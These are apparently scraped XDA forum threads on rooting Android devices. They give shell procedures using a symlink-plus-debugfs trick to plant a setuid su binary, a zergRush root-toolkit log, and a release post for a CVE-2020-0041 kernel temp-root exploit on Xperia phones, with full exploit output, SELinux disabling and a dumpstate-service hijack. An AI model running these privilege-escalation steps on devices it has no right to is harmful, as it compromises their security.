FOR SAMSUNG GALAXY TAB 2 7" ONLY: (see http://forum.xda-developers.com/showthread.php?t=1791193 thx to Nesquick95)
Code:
$ ln -s /dev/block/platform/omap/omap_hsmmc.1/by-name/FACTORYFS tmp
$ exit
Code:
adb reboot
adb shell
: some cleanup first
Code:
$ cd /data/local
: and now, let's do the dirty work
Code:
$ toolbox chmod 755 /data/local/debugfs
$ /data/local/debugfs -w /data/local/tmp
debugfs: cd xbin
debugfs: rm su
[COLOR="green"]NOTE: if this is your first attempt, you should see an error message here, simply ignore it[/COLOR]
debugfs: write /data/local/su su
debugfs: set_inode_field su mode 0106755
debugfs: set_inode_field su uid 0
debugfs: set_inode_field su gid 0
debugfs: quit
$ rm /data/local/tmp
$ mv /data/local/tmp.back /data/local/tmp
$ exit
: done, let's reboot and get root !
Code:
adb reboot
adb shell
$ /system/xbin/su
# id
[COLOR="Blue"]id=0(root) gid=0(root) ....[/COLOR]
# exit
: cleanup remaining files
Code:
$ rm /data/local/su
$ rm /data/local/debugfs
$ exit
Next step is to install ASAP the superuser app from the market, since my version of su is home-made, and was not designed with security in mind.
After installation, or if you previously installed, open it and check for an update, there should be one available. This will replace the non-securised su binary with the one provided by superuser. Reboot when asked to, and you're done.
And now here is the link for the binaries:
http://db.tt/FBUNeVmo
The source code of su is given, and debugfs was compiled natively from a gentoo chroot inside my Transformer (the first version was cross-compiled but segfaulted now and then).
Please let me know how it goes for you.
Credits: wolf849 for the symlink exploit
EDIT0: sparkym3 created a tool integrating this procedure. Although it seems to work only on Windows, a "few" users could make use of it
Here is the URL:
sparkym3 said:
I have created an automated tool using this root method and am looking for confirmation that it works on a Transformer 300.
http://forum.xda-developers.com/showthread.php?t=1706588
Click to expand...
Click to collapse
EDIT1: Here are the devices successfully rooted so far:
ASUS TF300T .26 .29 .30
ASUS TF201 .21 .28
ASUS TF101 S/N B70* .24
ASUS PadFone IML74K.CHT_PadFone-9.18.8.41_CHT_9.1.15-0
ASUS TF700T
SAMSUNG Galaxy II ICS 4.0.3
SAMSUNG Galaxy Tab 2 7"
milo
miloj said:
Hello,
I managed to root my TF300 this week-end.
Since the method of downgrading to .17, getting root, then waiting for Asus to update it again OTA to .29... was not really satisfying to me, I found a simpler (and hopefully safer) way to do it.
Story short: instead of getting write access to mmcblk0p4 to write a blob (as in method #2 of http://forum.xda-developers.com/showthread.php?t=1622628), I'm getting write access to mmcblk0p1 to write a single file, with suid perms.
Here is the full guide, and the link to the binaries at the end.
Please be sure to read it until the end, and to understand every line of it. I thus encourage you to read the debugfs manpage here: http://linux.die.net/man/8/debugfs
Of course, there is no garantee for this to work or to not brick your device, especially if you don't understand what you type, so RTFM twice.
Here is now the full guide:
Rooting the Asus Transformer TF300T
===================================
: first, use known method to get write access to the /system partition
adb push debugfs /data/local/
adb push su /data/local/
adb shell
$ cd /data/local/
$ mv tmp tmp.back
$ ln -s /dev/block/mmcblk0p1 tmp
$ exit
adb reboot
adb shell
: some cleanup first
$ cd /data/local
$ rm /data/local/tmp
$ mv /data/local/tmp.back /data/local/tmp
: and now, let's do the dirty work
$ chmod 755 /data/local/debugfs
$ /data/local/debugfs -w /dev/block/mmcblk0p1
debugfs: cd xbin
debugfs: write /data/local/su su
debugfs: set_inode_field su mode 0104755
debugfs: set_inode_field su uid 0
debugfs: set_inode_field su gid 0
debugfs: quit
: done, let's reboot and get root !
adb reboot
adb shell
$ /system/xbin/su
# id
id=0(root) gid=0(root) ....
# exit
: cleanup remaining files
$ rm /data/local/su
$ rm /data/local/debugfs
Next step is to install ASAP the superuser app from the market, since my version of su is home-made, and was not designed with security in mind.
And now here is the link for the binaries:
http://db.tt/FBUNeVmo
The source code of su is given, and debugfs was compiled natively from a gentoo chroot inside my Transformer (the first version was cross-compiled but segfaulted now and then).
Please let me know how it goes for you.
Credits: wolf849 for the symlink exploit
milo
Click to expand...
Click to collapse
If this proves to be successful across multiple users, I may try this out; I'm excited to see how this information pans out.
FYI, there was one success in this thread: http://forum.xda-developers.com/showthread.php?t=1688994 where I originally posted.
milo
Yep. That was me.
In essence I had a locked (can get OTA), not rooted device with .26 WW firmware.
Now I've got a locked (can still get OTA unless Asus changes something), rooted device with .29 WW firmware.
This is the holy grail for tf300t users at the moment.
I'm so happy!
For information, I just rooted a friend's TF201 with the same method
Sent from my ASUS Transformer Pad TF300T using XDA
Confirmed
CONFIRMED!
I rooted my WW.29 this way. No need to downgrade to .17 first.
Thank you, thank you, thank you
It worked! Simpel and easy on ww29 locked!
Thanks!!!
Confirmed working on US .29!
Edit: Does trying adb remount and failing have anything to do with the root or am I not understanding the adb command?
Question: Why weren't you satisfied with downgrading method? i asked because I did the downgrade method and the tf300 has been working fine.
NJ_RAMS_FAN said:
Question: Why weren't you satisfied with downgrading method? i asked because I did the downgrade method and the tf300 has been working fine.
Click to expand...
Click to collapse
Because risk was too high in my opinion:
- risk to brick when injecting the blob into mmcblk0p4 (if the tablet reboot in the middle, I guess you get a 500€ brick)
- risk to not receiving any ASUS OTA (many users have reported this, I didn't want to test it myself)
The procedure was also a bit too complex, between US, DE, DE to WW, and WW blobs.
Also the .17 WW blob is nowhere available.
With my method, there is one risk, it is if the tablet reboot in the middle of writing into the partition. But I guess than, like any other linux (or unix for that matter), the android boot would run fsck on the partition and get it repaired.
And my method is faster !!
Sent from my ASUS Transformer Pad TF300T using XDA
Thanks man. Worked like a charm for me olso.
I am on ww.29
Thanks, works like a charm!
ww.29
Beautiful.
Got root on ww .29 here.
mcho19 said:
Confirmed working on US .29!
Edit: Does trying adb remount and failing have anything to do with the root or am I not understanding the adb command?
Click to expand...
Click to collapse
I didn't try, but if I'm allowed to guess the debugfs tool doesn't check permissions as rigorously as mount commands (ie it's working on a lower level). But that's a guess. Another guess would be that dd'ing the su binary would have worked, but then you probably wouldn't have been able to set the correct permissions on the su binary.
NJ_RAMS_FAN said:
Question: Why weren't you satisfied with downgrading method? i asked because I did the downgrade method and the tf300 has been working fine.
Click to expand...
Click to collapse
The downgrade method doesn't work with OTAs on .WW firmware. This is the only way at the moment if you're > .17 WW or on .17 DE.
It may even work on __many___ more devices (but that's another guess).
miloj any chance you could make a YT video of this? This would be great to be added into the INDEX, in a YT format.
works!
Excellendo.
Chris
A great great thanks from an almost noob... My TF201 unlocked (!) .21 is now rooted!!
Pas remarqué que tu étais français aussi!
A great thanks from me, too!
I have one question: After dooing all steps, my tablet is rooted. But the SuperUser App doesn't ask me to allow the apps. In the SU-App from the Market i don't see any App allowed, but every app which needs root, works in root mode without asking.
Did I do something wrong?
Thank's a lot,
Niggy
Niggy86 said:
A great thanks from me, too!
I have one question: After dooing all steps, my tablet is rooted. But the SuperUser App doesn't ask me to allow the apps. In the SU-App from the Market i don't see any App allowed, but every app which needs root, works in root mode without asking.
Did I do something wrong?
Thank's a lot,
Niggy
Click to expand...
Click to collapse
You need to install superuser from market and reinstall the su binary.
As soon as possible.
At the risk of getting torched ...
Is there a Windows version of debugfs? I'm assuming this is to be done under Linux.
Any Windows equivalents?
Thanks
I'm trying to root my Kindle Fire - my end goal is to get Jellybean running on it. I'm running Xubuntu on my desktop. Here's the process for rooting:
---------------------------------------------------------------
Easy rooting toolkit (v2.0)
created by DooMLoRD
Modified for Kindle Fire for Linux/Mac by Max Lee at RootKindleFire.com
using exploit zergRush (Revolutionary Team)
Credits go to all those involved in making this possible!
---------------------------------------------------------------
[*] This script will:
(1) root ur device using latest zergRush exploit (10 Nov)
(2) install Busybox (1.18.4)
(3) install SU files (binary: 3.0.3 and apk: 3.0.6)
[*] Before u begin:
(1) enable USB DEBUGGING
from (Menu\Settings\Applications\Development)
(2) enable UNKNOWN SOURCES
from (Menu\Settings\Applications)
(3) [OPTIONAL] increase screen timeout to 10 minutes
(4) connect USB cable to PHONE and then connect 2 computer
---------------------------------------------------------------
--- STARTING ----
--- WAITING FOR DEVICE
--- cleaning
rm failed for *, No such file or directory
--- pushing zergRush
563 KB/s (23056 bytes in 0.039s)
--- correcting permissions
--- executing zergRush
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.
[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
[+] Found a GingerBread ! 0x00015118
[*] Scooting ...
[*] Sending 149 zerglings ...
[*] Sending 189 zerglings ...
[-] Hellions with BLUE flames !
--- WAITING FOR DEVICE TO RECONNECT
if it gets stuck over here for a long time then try:
disconnect usb cable and reconnect it
toggle USB DEBUGGING (first disable it then enable it)
--- DEVICE FOUND
--- pushing busybox
4395 KB/s (1075144 bytes in 0.238s)
--- correcting permissions
--- remounting /system
mount: permission denied (are you root?)
--- copying busybox to /system/xbin/
/system/xbin/busybox: cannot open for write: Read-only file system
--- correcting ownership
Unable to chmod /system/xbin/busybox: No such file or directory
--- correcting permissions
Unable to chmod /system/xbin/busybox: No such file or directory
--- installing busybox
/system/xbin/busybox: not found
--- pushing SU binary
failed to copy 'su' to '/system/bin/su': Read-only file system
--- correcting ownership
Unable to chmod /system/bin/su: No such file or directory
--- correcting permissions
Unable to chmod /system/bin/su: No such file or directory
--- correcting symlinks
rm failed for /system/xbin/su, Read-only file system
link failed Read-only file system
--- pushing Superuser app
failed to copy 'Superuser.apk' to '/system/app/./Superuser.apk': Read-only file system
--- cleaning
--- rebooting
--- WAITING FOR DEVICE
5139 KB/s (3104805 bytes in 0.589s)
Error: Could not access the Package Manager. Is the system running?
All Done, Kindle Fire ROOTED!!!
Check out RootKindleFire.com for more cool hacks!
Click to expand...
Click to collapse
I'm running the command with sudo. The device is recognized as follows:
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
5AA6002600000001 device
Click to expand...
Click to collapse
I've tried googling to solve, and either I'm coming up with the wrong terms, or... dunno. Found a ton of pages, but most of it is from a Windows perspective. Found a link to Kindle Fire Utility port for Linux, but link was dead.
I've tried running the above both with the Fire in USB mode and not (i.e. "disconnect").
Any ideas and insight would be quite welcome. I certainly don't mind relevant links to other places, either - I may well have missed relevant resources in my searching.
edit: Also, my adb_usb.ini file did initially contain 0x1949; per some threads I found I added 0x0006, which got my farther along, at least.
subedit: sorry for the delay in this edit, 5min wait time to edit my post. d'oh.
After the device fails like that, have you tried running the root process again immediately?
Sent from my Nexus 7 using Tapatalk
SwoRNLeaDejZ said:
After the device fails like that, have you tried running the root process again immediately?
Click to expand...
Click to collapse
Alas, yes. Have run the attempt around 15-20 times now, several times back to back.
Hmm.. Seems like an error in the script somewhere, are you using a bash file? Do you have access to a windows PC? This is exactly why I dualboot
Sent from my Nexus 7 using Tapatalk
SwoRNLeaDejZ said:
Hmm.. Seems like an error in the script somewhere, are you using a bash file? Do you have access to a windows PC? This is exactly why I dualboot
Sent from my Nexus 7 using Tapatalk
Click to expand...
Click to collapse
I'm using whatever Xubuntu set up, plus a few aliases that definitely wouldn't interfere...
I've actually just set up a Windows VM in Virtualbox, so my next step will be to try from there. Maybe that'll give me some different errors, if nothing else. hehe
I know that people have been successful using the KFU inside of a VM so you may be good to go
Sent from my Nexus 7 using Tapatalk
temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
including temporal magisk setup from the exploit
The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
I have adapted the Pixel 3 specific exploit for kernel 4.9 that is used with sony TAMA platform phones running Android 10 with February 2020 security patch level.
SUPPORTED TARGETS
H8116-52.1.A.0.618 - xperia XZ2 Premium
H8166-52.1.A.0.618 - xperia XZ2 Premium dual
H8216-52.1.A.0.618 - xperia XZ2
H8266-52.1.A.0.618 - xperia XZ2 dual
H8296-52.1.A.0.618 - xperia XZ2 dual
H8314-52.1.A.0.618 - xperia XZ2 Compact
H8324-52.1.A.0.618 - xperia XZ2 Compact dual
H8416-52.1.A.0.618 - xperia XZ3
H9436-52.1.A.0.618 - xperia XZ3 dual
H9493-52.1.A.0.532 - xperia XZ3 dual
This has been tested only with xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets have been implemented based on analysis of each kernel image from target firmware.
Please note, it is unlikely that any other fw version than those listed above would work.
The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.
USAGE HOWTO INCLUDING MAGISK SETUP
be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
enable developer mode options and in there adb debugging (eventually install adb drivers)
download the tama-mroot.zip with the exploit attached in this post
download Magisk-v20.4.zip from magisk releases page on github here
use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
unzip and prepare magisk setup with following commands in 'adb shell'
Code:
cd /data/local/tmp
unzip tama-mroot.zip
chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
./magisk-setup.sh
get temp root and start magisk up with following commands in 'adb shell':
Code:
cd /data/local/tmp
./tama-mroot
./magisk-start.sh -1
./magisk-start.sh -2
./magisk-start.sh -3
If it worked, you should see something like this:
Code:
H8216:/ $ cd /data/local/tmp
H8216:/data/local/tmp $ ./tama-mroot
[+] Detected H8216-52.1.A.0.618 target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd07822fa00
[+] file epitem at ffffffd102da6d00
[+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
[+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9dee01ebf8
[+] kernel base: ffffff9dece80000
[+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
[+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
[+] init_cred: ffffff9def02fcd0
[+] memstart_addr: 0xfffffff040000000
[+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
[+] Second level entry: ae419003 -> next table at ffffffd06e419000
[+] sysctl_table_root = ffffff9def05c710
[+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
[+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
[+] Injected sysctl node!
[+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffd07822fa20
[+] epitem.prev = ffffffd07822fad8
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
+ FRESH=false
+ '[' -2 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=2
+ '[' 2 '=' 2 ']'
+ mount -t tmpfs -o 'mode=755' none /sbin
+ chcon u:object_r:rootfs:s0 /sbin
+ chmod 755 /sbin
+ cp -a magisk/boot_patch.sh /sbin
+ cp -a magisk/magiskboot /sbin
+ cp -a magisk/magiskinit64 /sbin
+ cp -a magisk/busybox /sbin
+ cp -a magisk/util_functions.sh /sbin
+ cd /sbin
+ chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
+ mkdir r
+ mount -o bind / r
+ cp -a r/sbin/. /sbin
+ umount r
+ rmdir r
+ mv magiskinit64 magiskinit
+ ./magiskinit -x magisk magisk
+ ln -s /sbin/magiskinit /sbin/magiskpolicy
+ ln -s /sbin/magiskinit /sbin/supolicy
+ false
+ chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
+ rm -f magiskboot util_functions.sh boot_patch.sh
+ ln -s /sbin/magisk /sbin/su
+ ln -s /sbin/magisk /sbin/resetprop
+ ln -s /sbin/magisk /sbin/magiskhide
+ mkdir /sbin/.magisk
+ chmod 755 /sbin/.magisk
+ >/sbin/.magisk/config
+ echo 'KEEPVERITY=true'
+ >>/sbin/.magisk/config
+ echo 'KEEPFORCEENCRYPT=true'
+ chmod 000 /sbin/.magisk/config
+ mkdir -p /sbin/.magisk/busybox
+ chmod 755 /sbin/.magisk/busybox
+ mv busybox /sbin/.magisk/busybox
+ mkdir -p /sbin/.magisk/mirror
+ chmod 000 /sbin/.magisk/mirror
+ mkdir -p /sbin/.magisk/block
+ chmod 000 /sbin/.magisk/block
+ mkdir -p /sbin/.magisk/modules
+ chmod 755 /sbin/.magisk/modules
+ mkdir -p /data/adb/modules
+ chmod 755 /data/adb/modules
+ mkdir -p /data/adb/post-fs-data.d
+ chmod 755 /data/adb/post-fs-data.d
+ mkdir -p /data/adb/service.d
+ chmod 755 /data/adb/service.d
+ chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
+ chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
+ /sbin/magisk --daemon
client: launching new main daemon process
+ pidof magiskd
+ MP=14148
+ '[' -z 14148 ']'
+ >/sbin/.magisk/escalate
+ echo 14148
+ '[' -e /sbin/.magisk/escalate ']'
+ sleep 1
+ '[' -e /sbin/.magisk/escalate ']'
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
+ FRESH=false
+ '[' -3 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=3
+ '[' 3 '=' 2 ']'
+ >/sbin/.magisk/magiskd
+ echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
+ chmod 755 /sbin/.magisk/magiskd
+ chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
+ getprop init.svc.dumpstate
+ SVC=''
+ timeout=10
+ '[' 10 -gt 0 ']'
+ stop dumpstate
+ killall -9 magiskd
+ stop dumpstate
+ mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
+ start dumpstate
+ timeout=10
+ '[' 10 -le 0 ']'
+ pidof magiskd
+ MP=14165
+ '[' -n 14165 ']'
+ break
+ stop dumpstate
+ sleep 1
+ umount /system/bin/dumpstate
+ rm -f /sbin/.magisk/magiskd
+ '[' '' '=' running ']'
+ rm -f /dev/.magisk_unblock
+ /sbin/magisk --post-fs-data
+ timeout=10
+ '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
+ sleep 1
+ timeout=9
+ '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
+ /sbin/magisk --service
+ sleep 1
+ /sbin/magisk --boot-complete
+ chmod 751 /sbin
root_by_cve-2020-0041:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
root_by_cve-2020-0041:/data/local/tmp # uname -a
Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
root_by_cve-2020-0041:/data/local/tmp # getenforce
Permissive
Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.
Please be careful what you use the temp root for.
Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.
Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there. Backup of TA partition now works with tama-mroot avoiding 'Required key not available' you could experience with previously released tama-root.
There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup.
For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.
SOURCES
Exploit sources for all releases are available at my github here.
CREDITS
Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.
DONATIONS
If you like my work, you can donate using the Donate to Me button with several methods there.
Thank you very much to all who donate.
DOWNLOAD
CHANGELOG
2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
So you did it again! You are insane mate!!
Respect.
Relative noob here, I have a few questions with temporary root,
1- can I remove preinstalled apps e.g. I want to remove the preinstalled FB app,would it reappear after a reboot?
2- would this wipe our phones?
3- would it affect the camera etc
Thanks in advance.
@teostar, you may also check this thread for the answers.
Particularly post#5 may be applicable for tama too (did not check/test though).
So who's gonna go first? I'm interested to know if an ad block app like adaway can be installed now that modifies the hosts files. Or can I use titanium backup to backup/restore an app+data? There was an app I used to use via Xposed that let YouTube play in background as well, perhaps I can backup that app from old phone and restore it on my xz2c?
Edit: tried it, it works on my XZ2C H8314 on Verizon. Not sure what to do with it though. Seems that it just gives me a shell with root, dunno how that helps me get an app installed that needs root like adaway unless somehow I figure out what adaway app does behind the scenes and do it manually through the root shell?
well that didn't work, i guess the hosts file is in /system/etc/ so if we cant modify anything in /system then i guess even just modifying the hosts file could break something?
@Mike7143, to provide root access to apps, root manager like magisk is needed.
It can be started from an exploit (possibly with a bit limited functionality) as shown in this thread. Unfortunately that old magisk does not work with android 10.
I tried to start up latest magisk from the exploit, but it ended with magisk manager detected magisk root alright, but I could not make sending notifications from apps to ask magisk for root permission somehow.
So currently only the shell is available, allowing for example to backup still locked TA partition.
You can do small changes in /system, but if you would not get red triangle on boot, it would possibly revert the change.
You can modify stuff in /system on runtime "system less-ly" exactly like magisk does it though, using bind mounts.
Is this method compatible with lasted firmware? (.672)
Is this safe relock the bootloader with my backup? Nothing breaks?
Btw, amazing job! Now i think aosp project Will get more users. Hope xz3 get more popular in custom scene.
j4nn said:
Some partitions might still be possible to modify - for example in case of Sony Xperia XZ1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.
Click to expand...
Click to collapse
Thanks for mentioning the VoLTE modem config on still locked XZ1 devices! Somehow I didn't read that in the XZ1 thread. Good to know! Maybe I won't unlock the bootloader of my backup XZ1, because adding VoLTE for my German telco provider Congstar to the stock firmware is enough for my use case.
j4nn said:
Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there.
There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup. For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.
Click to expand...
Click to collapse
Too bad there is no possibility to restore the TA partition on the XZ2c yet. On the XZ1 this opened the door to real freedom!
j4nn said:
...Good news is that I've managed to adapt the first stage and eventually have been able to backup TA partition still in locked state. But then it went south, phone complained about corruption or something, refusing to boot and just powered off with no way of recovery - except bootloader unlock, that allowed me to eventually fix it.
Click to expand...
Click to collapse
So... if I'm reading this right, even just backing up the TA partition on the XZ2C caused something to break, forcing you to unlock? I was thinking maybe I should figure out how to backup my TA partition as well just in case in the future there's a fix, but if it's going to break it by just backing it up, that's an issue as well.
---------- Post added at 11:52 AM ---------- Previous post was at 11:42 AM ----------
j4nn said:
... I tried to start up latest magisk from the exploit, but it ended with magisk manager detected magisk root alright, but I could not make sending notifications from apps to ask magisk for root permission somehow.
So currently only the shell is available, allowing for example to backup still locked TA partition.
You can do small changes in /system, but if you would not get red triangle on boot, it would possibly revert the change.
You can modify stuff in /system on runtime "system less-ly" exactly like magisk does it though, using bind mounts.
Click to expand...
Click to collapse
So, basically all we have is temp root via adb shell. Doesn't seem that magisk works. I guess I'm not sure what you mean by "small" changes in /system, what is "small"? Coming from a 2013 Moto X developer edition that I could do anything with I'm really missing adaway and youtube adaway on my new XZ2C H8314. Not sure if modifying my hosts file would be considered small or not, and that doesn't take care of youtube adaway of which I'm not even sure how that works. DNS666 seems to be an alternative to adaway but it's not taking care of youtube.
Regarding modifying /system "system-lessly", I'll admit I'm a rookie when it comes to this stuff, I either have a lot to learn/read up on or wait for an easier to use app/workaround.
It seems like in your XZ1C post you and others were working on getting the XZ2C sorted out but since decided to go back and focus on the XZ1C?
@brunos0, the exploit cannot work with .672 firmware, the kernel in it already contains the vulnerability fix.
There is the list of supported targets / fw versions in the OP...
I am not aware of any method that would allow you to re-lock unlocked xz2* phone.
@SGH-i200, yes, I believe it should be possible to temp root oreo running xz1, from it flash your pie's oem partition, modify it according to your needs and upgrade with newflasher to latest pie skipping flash of oem partition, getting you latest stock pie with modified oem...
Concerning TA restore on XZ2c (or any other tama platform phone): it actually _is_ possible to easily restore TA partition from locked state backup, returning your device key (aka drm keys) back.
But it somehow seems the firmware does not use it anyway for some reason. Unfortunately even kernel hiding bootloader unlock does not help like it did with xz1* phones.
So it might happen that someone discovers a way to make drm features work if you have the keys restored from locked TA backup...
@Mike7143, no, that is a misunderstanding... That linked post, where I describe my initial exploiting of xz2 - that has been completely different exploit. That exploit has been originally designed for xz1c, ported partially for xz2 and in the process of trying/testing/implementing it, something broke... It has nothing to do with just released CVE-2020-0041 based exploit for xz2* phones.
So this new exploit is perfectly safe, only doing changes in RAM of linux kernel to escalate to root user with selinux changed to permissive.
After a reboot all is gone, no root or anything left from the exploit...
So you can safely backup locked TA to preserve the device key (drm keys) for future use.
Concerning changes - simply forget changing /system or /vendor or kernel boot partition.
It is however possible to use bind mounts to make "changes" on runtime, but that requires some knowledge obviously.
Maybe I can fix setup of magisk from the temproot exploit, but no promises, spent already huge amount of time on that and getting out of ideas unfortunately.
Thanks @j4nn for the reply. So you're saying that simply backing up the TA partition now while on this version and have temp root access shouldn't cause the phone to break? If so, I suppose it's worthwhile to get it backed up in case there's ever a future solution to restore it and have the system recognize it. Is the below quote from your OP regarding temp root on XZ1C how I'd backup my TA partition on my XZ2C?
j4nn said:
When renoroot is successful, you may use following commands in the root shell to backup the trim area partition:
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-locked.img
chown shell:shell TA-locked.img
sync
sync
And then try to read it out from the phone to your PC - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-locked.img
Click to expand...
Click to collapse
If so, seems pretty straight forward to backup the TA partition with my DRM keys!
Regarding systemless changes with bind mounts, I'll have to look into that. I found one post here that seems like it's just making a link to another location that perhaps might work, but perhaps even just swapping out a file for a link might not be safe. I'm probably better off just waiting for someone to make more user-friendly tools and then make donations vs. trying to learn on my own and risk breaking my device!
If I can find a cheap/broken screen H8314 I might be able to buy it if it'd help with development of getting the XZ2C to be unlocked/rooted and retaining all the Sony features. I plan on using this phone for a while just like I just traded my 2013 Moto X for the XZ2C in 2020!
@Mike7143, yes, that's the way to back up TA even in case of XZ2* phones.
Here is an example to use bind mount to change hosts temporarily on runtime from a root shell:
Code:
akari:/ # cd /data/local/tmp
akari:/data/local/tmp # cp /system/etc/hosts .
akari:/data/local/tmp # mount -o bind hosts /system/etc/hosts
akari:/data/local/tmp # echo "127.0.0.1 some.url.com" >> /system/etc/hosts
akari:/data/local/tmp # cat /system/etc/hosts
127.0.0.1 localhost
::1 ip6-localhost
127.0.0.1 some.url.com
akari:/data/local/tmp #
as it is only a mount, the change is done in /data/local/tmp/hosts in fact, that can be seen like this:
Code:
akari:/data/local/tmp # umount /system/etc/hosts
akari:/data/local/tmp # cat /system/etc/hosts
127.0.0.1 localhost
::1 ip6-localhost
akari:/data/local/tmp # cat /data/local/tmp/hosts
127.0.0.1 localhost
::1 ip6-localhost
127.0.0.1 some.url.com
akari:/data/local/tmp #
As it seems .618 fw versions get missing from xperifirm, please let me know if you need some - I still have following:
H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
so I may upload it on request.
j4nn said:
As it seems .618 fw versions get missing from xperifirm, please let me know if you need some.
Click to expand...
Click to collapse
I would be happy, if you mirror "H8324_*_52.1.A.0.618_R2C" for me! I forgot to check Xperifirm right after I read about your new temp root success. Shame on me.
j4nn said:
@Mike7143, yes, that's the way to back up TA even in case of XZ2* phones.
Click to expand...
Click to collapse
I tried to backup TA partition on XZ2C H8314 on 52.1.A.0.618 using temp root but when I run the line
Code:
dd if=/dev/block/bootdevice/by-name/TA of=TA-locked.img
I get
Code:
dd: TA-locked.img: Required key not available
Any ideas?
@SGH-i200, you can download it here:
https://androidfilehost.com/?w=files&flid=312525
H8324_Customized FR_1313-2469_52.1.A.0.618_R2C.zip
@Mike7143, you are right, it seems there is some limitation with the root permissions. I will check it. Probably would need some extension in the exploit.
j4nn said:
@Mike7143, you are right, it seems there is some limitation with the root permissions. I will check it. Probably would need some extension in the exploit.
Click to expand...
Click to collapse
